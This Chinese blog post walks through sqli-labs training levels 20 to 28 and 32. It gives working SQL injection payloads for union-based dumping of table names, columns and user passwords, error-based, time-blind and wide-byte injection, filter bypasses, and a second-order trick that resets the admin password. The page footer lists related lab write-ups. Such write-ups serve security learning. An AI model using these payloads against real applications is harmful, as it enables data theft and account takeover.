less---20-28

最新推荐文章于 2024-07-18 23:44:32 发布
最新推荐文章于 2024-07-18 23:44:32 发布
阅读量856 收藏 23
点赞数 18
文章标签: less 前端 css
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_72202802/article/details/139057568
版权

less-20

这关登陆成功会显示cookie,所以抓包在cookie处注入

less-21

这关登陆成功会显示cookie,所以抓包在cookie处注入,发现不成功,查看代码发现被编码

先对注入语句进行base64编码再注入

less-22

闭合字符",同21关

less-23

这关查看代码发现#和--被替换为空格,注释符号被过滤用编码形式和通过括号空格的方式都不成功

使用报错注入就可以,单引号放在1前面 

有长度限制也可以联合查询,注释没用可以用单引号闭合
 

?id=1' or '1'='1
//这样sql语句就变成 id='1' or '1'='1'
?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 or '1'='1
?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' ),3 or '1'='1
?id=-1' union select 1,(select group_concat(password,username) from users),3 or '1'='1

less-24

第二十四关有一个登录页面和注册页面还要一个修改密码页面,该关卡使用得是二次注入,因为登录页面和注册页面对于密码和账户名都使用mysql_real_escape_string函数对于特殊字符进行转义。这里我们利用的是注册页面,因为虽然存在函数对特殊字符进行转义,但只是在调用sql语句时候进行转义,当注册成功后账户密码存在到数据库的时候是没有转义的,以原本数据存入数据库的。当我们修改密码的时候,对于账户名是没有进行过滤的

猜测管理员账户admin,创建一个admin'#账户由于存在特殊字符转义会创建成功

然后修改密码,由于没有对修改密码过滤,发现最终修改的是管理员密码

修改密码时,数据库内更新数据语句:(pass_change.php)
$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";

带入数据就是:
$sql = "UPDATE users SET PASSWORD='111111' where username='admin' #' and password='admin原来的密码' ";

less--25  and or

输入order by显示被过滤成rder by ,可以考虑双写绕过

?id=1%27%20oorrder%20by%203--+

4报错,3正确,是三列,可以使用联合查询

?id=-1%27%20union%20select%201,(select%20group_concat(table_name)%20from%20infoorrmation_schema.tables%20where%20table_schema=%27security%27),3--+ //查看表名

?id=-1%27%20union%20select%201,(select%20group_concat(column_name)%20from%20infoorrmation_schema.columns%20where%20table_name=%27users%27),3--+ //查看列名

?id=-1%27%20union%20select%201,(select%20group_concat(username,0x23,passwoorrd)%20from%20users),3--+

//求字段

报错注入

?id=1%27%20||%20updatexml(1,concat(0x23,database(),0x23),1)--+

?id=1%27%20%26%20updatexml(1,concat(0x23,(select%20group_concat(table_name)%20from%20infoorrmation_schema.tables%20where%20table_schema=%27security%27),0x23),1)--+ //也可以用编码代替

less-25a整数闭合,报错没有回显,同25

less-26 空格

单引号闭合空格被过滤,可以加引号闭合

在MySQL中,括号是用来包围子查询的。因此,任何可以计算出结果的语句,都可以用括号包围起来。而括号的两端,可以没有多余的空格。

?id=1%27||(updatexml(1,concat(0x23,database(),0x23),1))||(%271%27)=%271

?id=1%27||(updatexml(1,concat(0x23,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=%27security%27)),0x23),1))||(%271%27)=%271

less-26a

没有报错信息,用联合查询或者盲注,使用时间盲注

?id=1')%26%26(if(ascii(substr(database(),1,1))>115,sleep(3),0));%00

less-27 

过滤

大小写绕过,报错注入

联合查询

less-28

过滤union select组合,报错无回显可以使用时间盲注

 

宽字节注入less-32

过滤 ’ 的时候往往利用的思路是将 ’ 转换为 ’ 。 在 mysql 中使用 GBK 编码的时候,会认为两个字符为一个汉字,一般有两种思路: (

1)%df 吃掉 \ 具体的方法是 urlencode(’) = %5c%27,我们在 %5c%27 前面添加 %df ,形成 %df%5c%27 ,而 mysql 在 GBK 编码方式的时候会将两个字节当做一个汉字,%df%5c 就是一个汉字,%27 作为一个单独的(’)符号在外面:

id=-1%df%27union select 1,user(),3--+

(2)将 ’ 中的 \ 过滤掉,例如可以构造 %**%5c%5c%27 ,后面的 %5c 会被前面的 %5c 注释掉。 一般产生宽字节注入的PHP函数: 1.replace():过滤 ’ \ ,将 ’ 转化为 ’ ,将 \ 转为 \,将 " 转为 " 。用思路一。 2.addslaches():返回在预定义字符之前添加反斜杠(\)的字符串。预定义字符:’ , " , \ 。用思路一 (防御此漏洞,要将 mysql_query 设置为 binary 的方式) 

\x00     \n     \r     \     '     "     \x1a

(防御,将mysql设置为gbk即可)

byl*
关注
  • 18
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-labs通关记录
qq_39670065的博客
07-11 1699
sqli-lab通关记录 1.docker搭建 运行:docker info //查看docker信息,确认docker正常 搜索sqli-labs:docker search sqli-labs 建立镜像:docker pull acgpiano/sqli-labs 查看存在的镜像:docker images 运行存在的镜像:docker run -dt --name sqli -p 80:80 --rm acgpiano/sqli-labs (参数解释:-dt 后台运行; --name 命名
sqli-labs ----less-26---37--练习
代码审计
03-07 938
sqli-labs————Less-26(绕空格、/*、#等) 该关卡提示空格和注释被转义,我们测试一下: http://www.sqli.com/Less-26/?id=1’报错 sqli-labs-master/Less-26/?id=1’ --+ 依旧报错, 我添加的注释不见了,应该是注释被转义成了空字符,我们换成;%00测试一下: http://www.sqli.com/Less-26/?id=1%20and%20sleep(4);%00 and应该被转义了 phpstorm
sqli-labs-less-23~28
giun的博客
02-14 525
Less-23 过滤了#,–,那么我们需要采用闭合引号方式进行注入, http://127.0.0.1/sqli-labs-master/Less-23/?id=-1%27%20union%20select%201,@@basedir,%273 http://127.0.0.1/sqli-labs-master/Less-23/?id=-1’ union select 1,@@datadir...
sql-lab 通关Less1 -65(深入学习)
ST0new的博客
10-02 1万+
文章目录sql-lab 复现通关(深入学习)前言目的less-1 基于错误的单引号字符串Less-2 基于错误的get整型注入Less-3 基于错误的get单引号变形字符型注入Less-4 基于错误的GET双引号字符型注入Less-5 双注入GET单引号字符型注入Less-6 双注入GET双引号字符型注入Less-7 导出文件GET字符型注入Less-8 布尔型单引号GET盲注Less-9 ...
Sqli-Labs做题笔记:Less-27 - Less-31
Forever_Han13的博客
01-24 1670
Less-27: http://localhost/sqlilabs/Less-27/?id=0%27%0AUnIon%0ASelECT%0A1,(SeLeCT%0Agroup_concat(concat_ws(%27-%27,id,username,password))%0Afrom%0Ausers%0A%0A),3;%00 Less-27a http://localhost/sqlilabs/Less-27a/?id=0%22%0AUnIon%0ASelECT%0A1,(SeLeCT%0Agroup_
SQLI-LAB  的 实战记录(Less 21 - Less 30)
这块盾牌有待改良
07-20 5482
Less - 21 Cookie Injection- Error Based- complex - string Less - 22 Cookie Injection- Error Based- Double Quotes - string
sqli-labs通关(less21~less30)
箭雨镜屋
09-03 3025
Less21 这关刚开始还是和Less20一样,进去是个登录的页面 输入正确的用户名和密码之后,返回的页面有User-Agent,客户端ip地址,cookie,用户名,密码,用户id等信息 登录过程中burpsuite也是抓到两个报文,第一个是发送用户名和密码的POST报文,第二个是GET报文且携带cookie 仔细看这关的GET报文,就和上一关不一样了,Cookie中uname参数的值是base64编码的。 把uname的值粘贴到burpsuite的decoder模块,先decod.
Python-数组切片
热门推荐
梦樱羽的博客
09-23 2万+
Python-数组切片 在SegmentFault上遇到一个问题,发现自己也不懂,找了资料弄懂了,翻译一下,加深印象。 本文翻译自usc.edu slicing-arrays 基于维度的切片 Python的切片可以被用于数组,它基于每一个维度。例如有一个3x3的数组: >>> a = reshape(arange(9), (3,3)...
sqli-labs Less-26、26a、27、27a、2828a(sqli-labs闯关指南 26、26a、27、27a、2828a)—Advanced injection
m0_54899775的博客
12-25 1294
sqli-labs Less-26、26a、27、27a、2828a(sqli-labs闯关指南 26、26a、27、27a、2828a)—Advanced injection
linux运维面试题2012.docx
10-30
5. 日志管理:通过`tail`、`grep`、`less`等命令查看和分析日志,寻找问题线索。 6. PHP优化:调整PHP配置文件(`php.ini`),如内存限制、脚本执行时间等。 7. Shell脚本:使用Shell编写自动化任务,如定期备份、...
CA-100CUSB充电线改装为移动电源
09-23
Location Ids supported is no longer restricted to 10 or less. Fixed bug that could cause computer to hang on surprise removal. Fixed bug that caused device handle notification to fail. 1.00.2154 ...
Zoomla!逐浪CMS2 x3.9.6.zip
07-16
传统网页基于原生CSS呈现,高手已经在基于sass和less进行编程化样式编译。 传统网站多用ps做图展示,前沿的逐浪CMS已经早早的引入svg矢量画图技术。 传统网站图标多基于JPG/PNG/GIF等点阵图呈现,而基于Webfont的...
3GPP-23501-g10(中文版).pdf
07-28
4.2.3 非漫游参考架构 28 4.2.4 漫游参考架构 31 4.2.5 数据存储架构 35 3gpp 公司 邮政地址 3GPP 支持办公室地址 650 路德卢西亚-索菲亚-安提波利斯 Valbonne-法国 电话:+33 4 92 94 42 00 传真:+33 4 93 65 47 ...
前端大厂最新面试题-css.docx
06-06
44. CSS预处理器是指使用特殊的语言来编写CSS代码,然后编译成浏览器可以识别的CSS代码,包括Sass、Less等。 45. CSS预处理器的优点是提高开发效率、简化代码、提高代码可维护性,缺点是需要学习新的语言和编译工具...
前端面试题日常练-day91 【Less】
qq_44640575的博客
07-16 265
希望这些选择题能够帮助您进行前端面试的准备,答案在文末在Less中,以下哪种语法适用于创建混合器(Mixin)?a) @mixinb) #mixinc) .mixind) @extendLess中的子元素选择器是用什么符号表示的?a) >b) +c) ~d) /在Less中,以下哪个功能用于处理媒体查询?a) @mediab) @query以下哪个Less函数可以用于获取颜色的亮度值?
在实际的网页开发中,LESS 相较于传统 CSS 的性能优势具体体现在哪些方面,又存在哪些可能的性能瓶颈?
最新发布
xy520521的博客
07-18 405
而传统的 CSS 每次使用都需要重复写,造成文件大小增大,而 LESS 可以减少重复代码,从而减小文件大小,提高加载速度。综上所述,虽然 LESS 在减少代码量、提高维护性和方便调试等方面有性能优势,但在编译时间、运行时性能和缓存问题上可能存在性能瓶颈。在实际开发中,应根据具体需求和项目规模选择合适的技术方案。提高维护性:LESS 可以将样式代码模块化,使用嵌套和变量等功能,使代码更易于理解和维护。缓存问题:LESS 文件每次都需要在浏览器中编译,而传统的 CSS 文件可以被浏览器缓存,减少加载时间。
深入解析:`cat` 与 `less` 命令在文件查看中的应用与对比
cheungxiongwei的博客
07-18 210
cat和less。通过详细解析它们的基本用法、常用选项及实际应用示例,本文对比了这两个命令的功能、适用场景和性能,旨在帮助读者根据具体需求选择最合适的工具。
前端面试题日常练-day93 【Less】
qq_44640575的博客
07-17 158
希望这些选择题能够帮助您进行前端面试的准备,答案在文末在Less中,以下哪个功能用于生成渐变背景?Less中的Import是用来做什么的?a) 引入外部样式表b) 创建动画效果c) 定义变量d) 处理函数在Less中,以下哪个功能用于处理字体样式?以下哪个Less函数用于获取颜色的透明度?a) hue()d) alpha()在Less中,以下哪个功能用于生成媒体查询?

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值